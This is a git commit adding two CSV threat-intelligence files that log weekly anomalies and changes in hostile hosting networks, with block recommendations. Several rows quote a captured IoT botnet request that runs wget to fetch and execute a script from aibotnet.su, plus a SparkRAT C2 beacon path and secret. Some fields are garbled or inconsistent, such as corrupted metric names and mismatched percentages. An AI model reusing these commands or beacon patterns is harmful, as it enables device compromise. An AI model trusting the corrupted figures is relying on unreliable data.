diff options
| author | hrbrmstr <bob@rud.is> | 2026-07-20 07:23:29 -0400 |
|---|---|---|
| committer | hrbrmstr <bob@rud.is> | 2026-07-20 07:23:29 -0400 |
| commit | 805ce54d6b181cdaab453e7e50cfac14cc371b6a (patch) | |
| tree | c04619314bcaf6eaa728a670f4de97c9aa45a26c /kevlar/2026-07-20/changes | |
| parent | a47b685eac21aeedad5c4ab5df5c67a1df905486 (diff) | |
chore: weekly asn update
Diffstat (limited to 'kevlar/2026-07-20/changes')
| -rw-r--r-- | kevlar/2026-07-20/changes/anomalies.csv | 12 | ||||
| -rw-r--r-- | kevlar/2026-07-20/changes/diff-vs-prior-week.csv | 28 |
2 files changed, 40 insertions, 0 deletions
diff --git a/kevlar/2026-07-20/changes/anomalies.csv b/kevlar/2026-07-20/changes/anomalies.csv new file mode 100644 index 0000000..ab23275 --- /dev/null +++ b/kevlar/2026-07-20/changes/anomalies.csv @@ -0,0 +1,12 @@ +anomaly_id,severity,asn,asn_org,description,indicator,evidence,action_recommended +ANOM-026,CRITICAL,AS200651,FlokiNET ehf,SPARKRAT retrofit on confirmed Tor exit node,"POST /api/client/update?arch=amd64&commit=08059e95dacafe0bf6e5782f8e2c8ec9cd8c5a17&os=windows UA SPARK COMMIT","Censys GreyNoise tags now include 'SparkRAT Client Update Scanner'; secret=3de172c65c5204dbce4c985d6616ca6fbbf337be4ddd40746307af802fa510a2 in headers","Block 185.100.87.136 + treat as dual-use Tor exit AND SPARKRAT-C2 communication. Block /api/client/update across the network edge." +ANOM-027,CRITICAL,AS216139,Iron Hosting Centre,Sequential port 6001-6050 uniform cluster in Censys aggregation,"Port 6001 to 6050 each showing ~345 events on AS216139 in Censys aggregation",Censys host.services.port aggregation reveals values 345-348 across sequential high ports 6001-50,"Investigate whether 46.30.46.124 is a backconnect-C2 listener farm or scanning appliance. Block high-port range 6000-6050 from AS216139 sources defensively." +ANOM-028,CRITICAL,AS57043,Hostkey B.v.,IoT botnet MIPS downloader from new Hostkey IP,"IP 132.243.194.215 (Frankfurt) GET /shell?cd+/tmp;rm+-rf+kla.sh;wget+http://aibotnet.su/bins/kla.sh on port 6001","3 separate events on 2026-07-16 from Frankfurt (Hostkey B.v. / DE); IP reverse DNS = odamanov600.ru; Netaxis Group registration 2026-03-06 (~4 months old IP)","Block 132.243.194.215, takedown request for aibotnet.su domain, monitor for repeat IP-block scans. Add Hostkey B.v. Frankfurt espionage observation." +ANOM-029,HIGH,AS209847/FORTIS,Baykov Ilya Sergeevich,Active HTTPS hallucination scanning from new FORTIS network with OpenSSH regreSSHion vuln,"IP 45.144.28.70 -- 998 Sponge sessions in 1 week, SSH banner OpenSSH_8.9p1 Ubuntu-3.16 with CVE-2024-6387 KEV + 22 other CVEs; BGP prefix 45.144.28.0/24 created 2026-06-06","Censys grey-noise malicious tagging; BULLETPROOF label present on host; network reg 2026-06-06 by Baykov Ilya Sergeevich (RU); single plausible SSH-only service 1 SSH port","Block 45.144.28.70 at the edge. Engage abuse@fortis.host for takedown references (expect no response)." +ANOM-030,HIGH,AS211720,Datashield Inc.,MSSQL TDS brute pivoting to Visual Production channels,"185.231.33.46 stuck on port 1433 MSSQL TDS probes; hostname short-tan-rat; self-signed cert prohaska.beatty.biz with TLS 1.0/1.1 still enabled","Censys enrichment confirms 1 service (HTTP/443 with Apache server) + JARM 07d19d...; previously scanned /ews/ (Exchange) now shifted to MSSQL probing -- likely SQL Server INTERNET leg of attack","Block 185.231.33.46 from any ports 1433/1434 communication outbound; review all MSSQL exposure to non-trusted networks." +ANOM-031,HIGH,AS51396,Pfcloud UG,New tooling 'odin-scanner/0.4' + 'Hello World' UAs deployed.clear,"Distinctive user-agent strings observed scanning SOCKS-style ports (11235, 20128)","Honeylabs fingerprinted UAs from 38 events + 12 events respectively on PFCLOUD IPs -- not seen in prior weeks","Mutate blocklists to include these UAs. Block outbound from PFCLOUD RO/NL networks (176.65.x.x, 204.76.203.0/24, 45.135.193.0/24)." +ANOM-032,HIGH,AS14956,RouterHosting LLC,Exposed Werkzeug fofa_monitor panel on port 5000 (Weak Basic Auth + HTTP -- not HTTPS),"Werkzeug/3.1.8 Python/3.12.3 server with HTTP/1.1 401 + WWW-Authenticate: Basic realm=\"fofa_monitor\" on port 5000 of 216.126.239.17","Censys flagged CENSYS-2022-1002 Unencrypted HTTP Weak Auth (HIGH). Likely a fofa-monitor panel to track attack campaigns.","Block port 5000 from 216.126.239.17 outbound AND inbound (block all incoming probe traffic). Take the panel off the internet -- it is MCAF exposed." +ANOM-033,MEDIUM,AS51852,Private Layer INC,IP rotation to 81.17.28.130 (new segment) with same OpenSSH HASSH flood profile,"Top IP rotated from 179.43.134.114 (prior) to 81.17.28.130 (current). Same OpenSSH 8.9p1 HASSH server.","Censys enrichment shows 81.17.28.128/27 RIPE CIDR owned by Private Layer INC; previously unseen host","Block 81.17.28.0/24 socks and watch for further 81.17.x.x range activity expansion." +ANOM-034,MEDIUM,AS198953,Proton66 OOO,New Redis reconnaissance + RDP-variant ports (3395/3396/3399) targeted,"37.77.150.83 hit port 6379 3x (Redis). 193.143.1.66 hit ports 3395/3396/3399 -- non-standard RDP-variant ports.","18+3 events across 2 new IPs","Block 176.120.22.0/24 and 37.77.150.x.x for RDP/Redis brute reconnaissance." +ANOM-035,MEDIUM,AS214940,Kprohost LLC,Massive UA rotation expanded to 20+ browser UAs including Konqueror 3.0-rc4, Android HTC Tattoo 1.6, IE 10, IE 6, YaBrowser","20+ distinct UAs from 3 KPRONET IPs (77.83.39.119, .42, .94) over port 443","Censys GreyNoise malicious classification with ENV Crawler tag -- new .env scanning related evidence","Block 77.83.39.0/24 fully -- previous WAH aggressive evasion has escalated to user-agent laundering." +ANOM-036,MEDIUM,AS400992,ZhouyiSat Comm,Census return pure WINDOWS admin port profile indicates shift to WMI/RPC/SMB brute,"Censys port aggregation shows 95 RDP/5985 WinRM/135 RPC/139 NetBIOS/445 SMB/47001 -- only small portion on Linux (44/80, ssh 22:44)","Prior week observed /.env scanning which has stopped; current week shows no honeypot hits but census footprint unchanged essentially -- suggests IP rotation away from sensors","Block 23.172.217.0/24 + 185.121.15.0/24 + 193.46.218.0/24 at internet-edge."
\ No newline at end of file diff --git a/kevlar/2026-07-20/changes/diff-vs-prior-week.csv b/kevlar/2026-07-20/changes/diff-vs-prior-week.csv new file mode 100644 index 0000000..b63947c --- /dev/null +++ b/kevlar/2026-07-20/changes/diff-vs-prior-week.csv @@ -0,0 +1,28 @@ +metric,asn,asn_org,prior_value,current_value,delta,delta_pct,category,notes +active_asns,total,,15,17,+2,+13%,expansion,"2 new ASNs active: AS209847 (sponge 998 sessions via m/cross-AS FORTIS path), AS30823 (single benign-looking Android HTTPS connection). 2 ASNs dropped to 0: AS140666 lost census coverage (was 588 prior week); AS206728/AS216309/AS58854/AS202685/AS394711 continue dormant." +event_volume_AS51396,AS51396,Pfcloud UG,10000+,2500+ (sponge 10K hyperactive 22/80/8080/27017/5678),-7500,-75%,decrease,"Honeylabs event count notably down (~2500 summed) -- likely fewer honeypot target hits this week. Sponge volume still 10K+ (capped); top IP 204.76.203.18 hits 13766 sponge sessions -- NEW top IP, last top IP was 176.65.148.25 (473 events Honeylabs)." +ip_rotation_AS51396,AS51396,Pfcloud UG,204.76.203.78/79/80,204.76.203.18/.30/.49/.81,+4,new,-,new,"Coordinated 204.76.203.x scan-cluster persists in cluster identity but rotates specific IPs week-to-week -- botnet operator using lower-numbered IPs this week." +event_volume_AS200593,AS200593,Prospero Ooo,3890,968,-2922,-75%,decrease,"Volume sharp decrease. Still the same TM-based IP 91.202.233.79 doing scanning hit-and-run. Censys showed 0 census hosts this week -- infra fully withdrawn from public scanscape." +event_volume_AS198953,AS198953,Proton66 OOO,539,810,+271,+50%,increase,"Top IP rotated: 176.120.22.240 -> 176.120.22.16 (759 sponge events, GreyNoise suspicious). Multi-protocol brute sustained." +event_volume_AS51852,AS51852,Private Layer INC,1802,264,+1538,-85%,decrease,"Top IP rotated: 179.43.134.114 -> 81.17.28.130 (CH Bellinzona). Event volume dropped bit still active. Lower-IPv4 noise suggests IP rotation." +event_volume_AS14956,AS14956,RouterHosting LLC,206,128,-78,-38%,decrease,"Persistent multi CVE scanning. PMTA-Auto UA now active + persistent Minecraft server port 25565 reconnaissance + anydesk RDP scanning. Censys shows new fofa_monitor panel." +event_volume_AS214940,AS214940,Kprohost LLC,46,42,-4,-9%,stable,"Stable - low volume HTTPS scanning with rotating browser UAs (20+ UAs this week). RP. Censys shows BULLETPROOF, port 443 dominant." +event_volume_AS200651,AS200651,FlokiNET ehf,20,18,-2,-10%,stable,"Tor exit stable. OpenSSH upgraded from 10.1 -> 10.2p1. NEW: SPARKRAT-related POST /api/client/update?arch=amd64&commit=08059e95...&os=windows pattern detected; GreyNoise observed SPARKRAT tag." +event_volume_AS57043,AS57043,Hostkey B.v.,1,3,+2,+200%,increase,"Single IP 132.243.194.215 from Frankfurt (DE) dropped IoT MIPS downloader /shell?cd+/tmp;rm+-rf+kla.sh;wget+http://aibotnet.su PORT 6001. Censys forward DNS odamanov600.ru. Netaxis Group Ltd (CY) registered March 2026 (~4 months ago). HASSH fingerprint meaningless (HTTP-only port 6001 probe, no SSH)." +event_volume_AS400992,AS400992,ZhouyiSat Comm,2,0,-2,-100%,drop-off,"No honeylabs events this week. Sponge activity 256 sessions. Censys shows pure WINDOWS admin port profile (3389/5985/135/139/445/47001/5357). New attack orientation: shifted to WMI/RPC brute from prior-week .env URL scanning." +ip_rotation_AS400992,AS400992,ZhouyiSat,185.228.72.109 (prior),23.172.217.77/185.121.15.184/193.46.218.82,+3,new,-,new,"Full host IP rotatation. Censys shows the 23.172.217.x cluster is a Russian-hosted (DE / IPv6)." +new_asns,AS209847,(spurious sponge tag; actually AS41745 FORTIS),--activation,998 sessions,+998,new,new,"First time observed via Sponge 998 sessions from single IP 45.144.28.70 (HTTPS port cluster scanning). Censys shows actual AS = FORTIS-AS Baykov Ilya Sergeevich (RU), BGP prefix created 2026-06-06 -- 6 weeks old network. BULLETPROOF label." +new_asns,AS30823,aurologic GmbH,--no activity,8 sessions + 1 HL,+9,new,new,"9704-host census providers in Censys with robust dual-VIP stack. 0 honeylabs events except single benign HTTPS GET from 41.216.188.21 (DE). Likely commercial small-activity ISP -- may not actually be bulletproof but listed by Censys as BULLETPROOF based on aggregated factors. Treat with caution." +att这儿enant_drop,AS210644,Aeza Group LLC,1858 hosts census,0 hosts census,-1858,-100%,contraction,"COMPLETE Censys census wipe -- Aeza has withdrawn from public scanscape. May have migrated IPs to alternative AS. Sponge shows 11 sliding sessions." +att Droplmetric_AS200593,AS200593,Prospero Ooo,1800 hosts census,0 hosts census,-1800,-100%,contraction,"Prospero census vanished while still active honey scanning - they darkened their attack infra (or migrated to alternate BGP like Prospero may have moved to a different hosted sub)." +new_attack_pattern,AS51396,Pfcloud UG,none,new-UA:odin-scanner/0.4,new,new,new,"New tool signature 'odin-scanner/0.4' observed scanning ports 11235/20128 -- added to make money on the pfcloud scan farm tooling alongside zgrab/Hello World." +new_attack_pattern,AS200651,FlokiNET/AS,none,sparkrat-update-callback,new,new,new,"New SPARKRAT beaconing pattern POST /api/client/update?arch=amd64&commit=08059e95dacafe0bf6e5782f8e2c8ec9cd8c5a17&os=windows -- content-type: application/octet-stream -- secret: 3de172c65c5204dbce4c985d6616ca6fbbf337be4ddd40746307af802fa510a2" +new_attack_pattern,AS198953,Proton66 OOO,none,redis-port-6379,new,new,new,"New Redis probe from 37.77.150.83 -- cache-based reconnaissance (new for Proton66)" +new_attack_pattern,AS211720,Datashield,none,mssql-tds-brute,new,new,new,"MSSQL TDS probing port 1433 from hostname 'short-tan-rat' (reverse rDNS poisoned)" +new_attack_pattern,AS57043,HOSTKEY,none,iot-botnet-downloader,new,new,new,"IoT MIPS downloader targeting port 6001 /shell?cd+/tmp;rm+-rf+kla.sh;wget+http://aibotnet.su/bins/kla.sh -- new for Hostkey." +new_attack_pattern,AS14956,ROUTERHOSTING,none,fofa-monitor-panel,new,new,new,"Exposed Werkzeug/Python fofa_monitor Basic realm panel on port 5000 (HIGH misconfig)." +new_fingerprint,AS51396,Pfcloud,none,odin-scanner-0.4-UA,new,new,new,"Brand-new tooling signature." +new_fingerprint,AS200651,FlokiNET,none,sparkrat-hassh-upgrade-10.2p1,new,new,new,"HASSH client updated OpenSSH 10.1 -> 10.2p1 (subtle: same HASSH but new banner string). Implies ongoing active maintenance." +new_fingerprint,AS57043,Hostkey,none,ja4h-777e992b8532-botnet,new,new,new,"Distinctive JA4H for IoT MIPS downloader hardcoded bot calls (/shell?cd+/tmp;rm+-rf+kla.sh;wget+http://aibotnet.su/bins/kla.sh)." +volume_explosion_AS216139,AS216139,Iron Hosting,2100 hosts,2358 hosts,+258,+12%,slight_increase,"Censys growth modest. MAJOR anomaly: NEW sequential port 6001-6050 cluster ~345 sessions each in Censys aggregation -- highly anomalous backconnect-C2 listener pattern detected." +volume_drop_AS140666,AS140666,ADP / ANY DIGITAL,588 hosts,0 hosts,-588,-100%,contraction,"Disappeared from Censys. Sponge activity almost nil (2 sessions). Likely transited to a different BGP AS or pulled back services."
\ No newline at end of file |
